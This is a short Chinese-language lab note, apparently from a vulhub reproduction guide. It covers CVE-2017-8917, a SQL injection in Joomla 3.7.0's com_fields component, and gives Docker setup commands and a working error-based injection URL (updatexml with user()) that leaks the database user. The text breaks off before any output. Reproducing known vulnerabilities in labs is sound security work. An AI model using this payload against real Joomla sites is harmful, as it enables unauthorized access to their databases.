Joomla 3.7.0 SQL注入漏洞CVE-2017-8917¶
简介¶
漏洞是由此Joomla 3.7.0 版本中引入的新组件(com_fields)带来的
环境搭建¶
cd /root/vulhub/joomla/CVE-2017-8917 docker-compose up -d
启动后访问http://your-ip:8080即可看到Joomla的安装界面 按照顺序安装即可 安装完成后,访问http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1),即可看到报错信息: